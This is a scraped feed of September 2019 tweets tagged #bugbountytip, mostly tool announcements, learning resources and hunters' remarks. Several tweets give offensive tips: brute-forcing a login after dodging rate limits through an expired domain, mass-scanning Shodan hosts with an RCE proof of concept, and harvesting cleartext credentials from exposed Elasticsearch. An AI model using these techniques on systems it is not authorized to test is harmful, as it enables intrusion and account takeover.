0 This was sick..........ey u suckers.. I got a really weird idor ........in Google's product writeup coming soon .............................! #bugbounty #bugbountytip #googlevrp #vrp
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-29 07:32:25
0 Give your Career A Boost with 🏆🏆 C|EH Certification 🏆🏆 Join HackDoor for Getting C|EH Certified Today !! 💰💰💰 Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/bGmyRodDCR
Eduard Tolosa
@Edu4rdSHL


2019-09-29 02:32:54
3 Tool for subdomains monitoring of your #BugBounty or #pentesting targets? Findomain 0.4.0 is out! Now Findomain can tell you where is a new subdomain for a specific target or a list of targets. See https://t.co/T18VChCGrT #bugbountytip #monitoring #subdomains #hacking #OSINT
Anonymous Worldwide
@AnonsWorldwide


2019-09-29 01:13:05
8 As it gets harder economically to get by for most of us you can make an income if you are into technology. Register these bounty programs to report a bug. These top 30 #BugBounty programs are definitely worth checking out: https://t.co/TGVOzUAMLX #Hacknews #bugbountytip https://t.co/mga4ebFVlj
Berk Bulan
@berk_bulan


2019-09-29 00:08:29
0 Best Practice Labs ------------------------------ BWAPP Webgoat Rootme OWASP Juicy Shop Hacker101 Hacksplaining Penetration Testing Practice Labs Damn Vulnerable iOS App (DVIA) Mutillidae Trytohack HackTheBox SQL Injection Practice #BugBounty #bugbountytips #bugbountytip
Berk Bulan
@berk_bulan


2019-09-29 00:04:16
2 Some Books for reading about Bug Hunting 1) The web application hackers handbook finding and exploiting security flaws -ed2 2011 2) OTGv4 3) Web Hacking 101 4) Breaking into infosec #BugBounty #bugbountytips #bugbountytip
Berk Bulan
@berk_bulan


2019-09-28 23:57:56
0 Good resource for beginner bug bounty hunters ;) #bugbountytips #bugbountytip #BugBounty https://t.co/giIArFJMZ6
baluz🔥
@haknfuk


2019-09-28 11:53:11
1 Some useful twitter Dorks...! #bugbountytip csrf - returns all tweets that include csrf term #bugbounty swag - returns all programs that give swag #bugbountytips ssrf - returns all tweets regarding ssrf #bugbountytip graph api - returns all about garap…https://t.co/fdiaE2eJtv
Sanketh Sharath
@sharathsanketh


2019-09-28 10:49:20
0 From knowing absolutely nothing in web hacking to my 1st bounty this month, the journey has been arduous yet exciting! https://t.co/X5ed6r0dIR #bugbounty #bugbountytips #bugbountytip
A hacker's life
@Unknownuser1806


2019-09-28 02:35:31
1 Resources-for-Beginner-Bug-Bounty-Hunters https://t.co/GvowSG82JJ #bugbounty,#hacking,#bugbountytip
Dwiki Kusuma
@malexplore


2019-09-27 23:35:51
0 Don't get me wrong, I just want to be polite 😂 #bugbountytips #bugbountytip #synack https://t.co/QKFrSrOtvG
mahendra purbia
@mahendrapurbia7


2019-09-27 20:09:00
1 🔰HOF🔰 & appreciation letter given by https://t.co/yeySsQb8h5 Happy to secure. #bugbountytip #bugbounty #bugbcrowd #openbugbounty #cybersecurity https://t.co/rm20i8LPak
Λявєη
@spenkkkkk


2019-09-27 12:39:03
0 curl https://t.co/ptThqLAUu1 --silent | grep Disallow | awk '{print $2}' #bugbountytip #oneliner
Çlirim Emini
@0xcela


2019-09-27 11:44:57
0 import time #bugbountytip #bugbountytips
Milind Purswani
@MilindPurswani


2019-09-27 07:01:44
0 Never ever ever ever ever do recon without tmux. Trust me, it's a life saver. #bugbountytip
baluz
@haknfuk


2019-09-27 03:47:10
0 If you're struggling with exploiting xss and bypassing filters..... Remember he is there @spyerror #bugbountytip
ghostlulz
@ghostlulz1337


2019-09-27 02:48:33
2 Yet another Elastic search database with thousands of clear text credentials. If you're not looking for these on your bug bounties you're missing out on easy wins. More info on my blog https://t.co/kqwIe5WNwy #BugBounty #BugBountyTip #infosec #elasticsearch #redteam #bugbountytips https://t.co/1FrEIz8kHp
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-26 21:17:34
0 @teamsnap Reported Vulnerability under your Responsible Disclosure Program - You fixed vulnerability without any acknowledgement or reward !! A good lesson for all #BugHunters ! #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-09-26 19:02:52
0 Less than 1$💪👉https://t.co/JPaA4CsKRe #BugBountyTip #xss #xxe #sqli #ssrf #ce
bugbountymemes
@bugbounty_memes


2019-09-26 17:16:19
1 i was rewarded 4 times $1,000 bounty -> Bypass 429. 1. found expired domain. 2. found login form with 429 protection after some attempts. 3. replace the domain with expired domain. 4. start bruteforce. Now you don't have 429 too many requests #bugbountytip #bugbounty
Muhab Alhadi
@MuhabAlhadi


2019-09-26 14:48:50
0 Burp suite is a beast, but Owasp ZAP does the job when you're Broke 😁 I really like its Hidden directory feature, the Tool is solid #owaspZAP #bugbountytip
Un4gi
@Un4gi1


2019-09-26 13:25:27
0 Apparently uploading a malicious executable file or pdf, etc. is a “feature”. No support employee would ever open an attachment without heavy social engineering.. 🙄 I‘m starting to hate @Hacker0x01 managed programs more and more every day... #bugbountytip https://t.co/PslGB8W1Ad
Henry Chen
@chybeta


2019-09-26 11:25:54
1 my personal monitor system alerts me to update Jenkins,Joomla,Spring and Jira Jenkins: https://t.co/3QLlyzxZcb Joomla: https://t.co/PHiJqZqEgr Spring: https://t.co/1QePyPw7DF Jira: https://t.co/hTyIUVC9yC #bugbounty #bugbountytip #bugbountytips https://t.co/u9gxcgC2vh
intigriti
@intigriti


2019-09-26 11:11:37
10 Testing a Ruby on Rails app? Add .json to the URL and see what happens! 😏 Thanks for the #BugBountyTip, @yaworsk! 🙌 https://t.co/oHlHilQtr7
Matt Palmer
@mattpalmer_au


2019-09-26 08:29:07
0 When doing massive amounts of recon on a program with a large scope, how does everyone keep motivated? #bugbountytip #bugbountytips
A hacker's life
@Unknownuser1806


2019-09-26 08:12:14
1 This tool simply iterates over hosts on port 443 and 80 and runs a PoC to test if they are vulnerable to RCE. You can use Shodan to gather potential targets: https://t.co/svK0gwpuRk #bugbounty, #bugbountytip, #hacking
Somdev Sangwan
@s0md3v


2019-09-26 05:52:22
0 This tweet didn't get enough reach, should I add #bugbountytip?
Sandeep Kamble
@SandeepL337


2019-09-26 04:36:41
0 Hey H4x0r, create as many as possible accounts. Try to hijack other accounts using bruteforce, automated bots or any vulnerabilities. https://t.co/Zk48BocHuE Enjoy !!! DM me results and get the cool swag from @SecureLayer7. #bugbounty #bugbountytip #infosec
Eduard Tolosa
@Edu4rdSHL


2019-09-26 03:28:31
6 Findomain 0.3.0 is out! * Added support to work only with resolved subdomains. * Added support for writing to custom output unique file (still when reading domains from file). * A lot of code improvements. https://t.co/qay2bKyJ5K #bugbounty #subdomains #bugbountytip #tools
FS
@fsec__


2019-09-26 02:51:41
0 Bug bounty bazaar and contest! https://t.co/AYxkrwAoXK https://t.co/9eeeKg3lm9 #BugBounty #bugbountytip #bugbountytips
ak1t4 🇦🇷
@akita_zen


2019-09-25 23:31:48
0 @hakluke @TomNomNom #bugbountytip: For a quick vim exit, use nano.
A hacker's life
@Unknownuser1806


2019-09-25 22:34:44
0 Using URI to pop shells via the Discord Client https://t.co/xtT8DuW0ei #bugbountytip ,#bugbounty ,#hacking
bugbountytip
@a_l_e_r_t_1_


2019-09-25 21:47:44
0 Less than 1$ no ads ❌💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Security Executions Code
@pwn0sec


2019-09-25 20:01:08
0 Find (XSS) Vulnerabilities with (𝐗𝐒𝐒)-𝐋𝐚𝐛𝐬 [Tutorial] https://t.co/IfpKUm1Azs #bugbounty #bugbountytip #bugbountytips #xss
Andri Wahyudi 🕊️ ‏
@andripwn


2019-09-25 18:36:42
0 Web App Penetration Testing - Recon Part #6 https://t.co/bPJkQbIgDZ #BugBounty #bugbountytips #bugbountytip #hackerone
m0z
@LooseSecurity


2019-09-25 17:44:02
2 The secret to a good bug bounty career is approaching payment like you would luck. If you get it, you're happy, if not then that's just how life is. There is no point complaining, pay it forward and being a nice guy will pay off in the end. #BugBounty #bugbountytips #bugbountytip
Fisher
@Regala_


2019-09-25 17:25:04
0 Valid within and outside bb, never hole yourself up in your own opinion bubble 🙏 #bugbountytip https://t.co/MFeVw0xllI
Bugploit
@bugploit


2019-09-25 08:10:23
0 Bad luck again 🙃! #bugbounty #bugbountytip #bugbountytip https://t.co/nyCKPRRlwL
expl0itc0der
@vanshitmalhotra


2019-09-25 05:59:13
0 Abusing VPC Traffic Mirroring in AWS : Deploying a Malicious Mirror with Compromised AWS Credentials : #BugBounty #BugBountyTip #penetrationtesting #pentesting #cybersecurity #devsecops https://t.co/7oTKO87uT4
expl0itc0der
@vanshitmalhotra


2019-09-25 05:55:16
1 pure bash bible : A collection of pure bash alternatives to external processes : #BugBounty #BugBountyTip #penetrationtesting #pentesting #cybersecurity #devsecops https://t.co/WFrwiofDPJ
expl0itc0der
@vanshitmalhotra


2019-09-25 05:53:43
0 navi : An interactive cheatsheet tool for the command-line : #BugBounty #BugBountyTip #penetrationtesting #pentesting #cybersecurity #devsecops https://t.co/wW8DAqxakm
expl0itc0der
@vanshitmalhotra


2019-09-25 05:52:28
0 gitGraber : Monitor GitHub to search and find sensitive data in real time for different online services such as: Google, Amazon, Paypal, Mailgun, Facebook, Twitter, Heroku, Stripe : #BugBounty #BugBountyTip #penetrationtesting #pentesting #devsecops https://t.co/d3uSf6oV3X
expl0itc0der
@vanshitmalhotra


2019-09-25 05:48:20
0 [Bug Bounty] Exploiting Cookie Based XSS by Finding RCE #BugBounty #BugBountyTip #penetrationtesting #pentesting #cybersecurity #devsecops https://t.co/C6BWshUbE6
Yusuf Yazir
@Hacklad


2019-09-25 04:34:48
0 @moodiAbdoul Glad to hear that bud. Search on Twitter "#bugbountytip ato" or "#bugbountytip takeover" that's my #bugbountytip 💪 Do it ✔
Shubham Sharma
@Shubham_pen


2019-09-25 03:24:49
0 Banner grabbing is a process to collect details regarding any remote PC on a network and the services running on its open ports. @rajchandel @kalilinux @ubuntu @nmap #RedTeam #CyberSecurity #infosec #bugbountytip #Pentesting #CTF #OSCP #GodMorningWednesday https://t.co/bYuLQsIdMA
A hacker's life
@Unknownuser1806


2019-09-25 02:35:02
0 “The journey of Web Cache + Firewall Bypass to SSRF to AWS Credentials compromise!” by Avinash Jain (@logicbomb_1) https://t.co/dMNo89RrZN #bugbounty,#bugbountytip ,#hacking
ICO scams & etc
@Scams_Alarm


2019-09-24 21:17:17
0 #Telegram just launched a competition to fix its #blockchain. #TON issues on GitHub are rising, no documentation🙈. After raising 1.5 billion$+ 💸 Contest 💎https://t.co/P1q9EigN7x $TON GitHub 💎https://t.co/cisSF9zhQk #bugcontest #bugbountytip #crypto #ico # https://t.co/CuPhJbjw8Z
A hacker's life
@Unknownuser1806


2019-09-24 19:56:17
0 “#BugBounty — ‘Journey from LFI to RCE!!!’-How” by Avinash Jain (@logicbomb_1) https://t.co/pnUI6Xmrdk #bugbountytip,#hacking,#programming
Murdockz
@Murdockz_CEH


2019-09-24 19:26:58
0 Finally wrote a script to git pull all my BB tools. Long overdue. check it out https://t.co/iv6PfCd2pN #bugbounty #bugbountytips #bugbountytip
Arif Khan
@payloadartist


2019-09-24 15:24:51
0 This is really something one should try out. It eases out your recon to a great extent. #bugbounty #infosec #bugbountytip https://t.co/iJxu1Y09hf
A hacker's life
@Unknownuser1806


2019-09-24 09:41:16
0 aquatone results for sites with bug bounties Raise an issue if you want a fresh scan or a new domain to be checked https://t.co/o2na3KQISM #bugbounty,#hacking,#bugbountytip
David Haigh
@BugDevilDavid


2019-09-24 08:56:20
0 There is a bug in iOS 13 where you can’t turn off HomePod alarms which is really weird @apple are you going to fix this? #homepod #tech #bug #bughead #softwaretesting #software #ios #ios13 #homekit #major #wtf #apple @theapplehub @AppleSupport #bugbountytip #testing https://t.co/6p8nvNrGI0
Vulkey_Chen
@Vulkey_Chen


2019-09-24 08:28:26
0 #BurpSuite #bugbountytip #bugbountytips Burpsuite extension: phpStudy Backdoor Remote Code Execution Scanner https://t.co/KmowGjUxcA
Rapid Safeguard
@RapidSafeguard


2019-09-24 05:34:25
0 https://t.co/XzCLxBUQXt Counter strike Global offensive that allows a remote attacker to execute remote code without the users permission. #CounterStrikeGlobalOffensive #infosec #vulnerability #Bugs #bugbountytip https://t.co/HmkCj1cKHs
𝙿𝚘𝚖𝚎𝚐𝚛𝚊𝚗𝚊𝚝𝚎 🌴
@ret2pomegranate


2019-09-24 02:28:53
0 Has anyone been paid by @ATT Bug Bounty Program? If so what is the expectancy waiting time till bounty or how long did it take to bounty & resolve? #BugBountyTip #infosec #ATT #bugbounty #hackerone
bugbountytip
@a_l_e_r_t_1_


2019-09-23 20:06:17
0 Just 1$ https://t.co/JPaA4CKmfO #bugbountytip #bugbounties
Abss
@abss_tbh


2019-09-23 17:54:04
0 Get your targets IP ranges using your targets domain (asn+cidr extract): a=$(curl -H'Accept: application/json' https://t.co/NGktlz9hSE$(dig +short $domain | head -1)| jq .as_number);echo '!gas'$a''| nc https://t.co/iLNKnnj93I 43 | tr " " "\n" | sed -e '1d' -e '$d' #BugBountyTip https://t.co/YzNOF6r1bD
Kenan
@h1_kenan


2019-09-23 14:47:07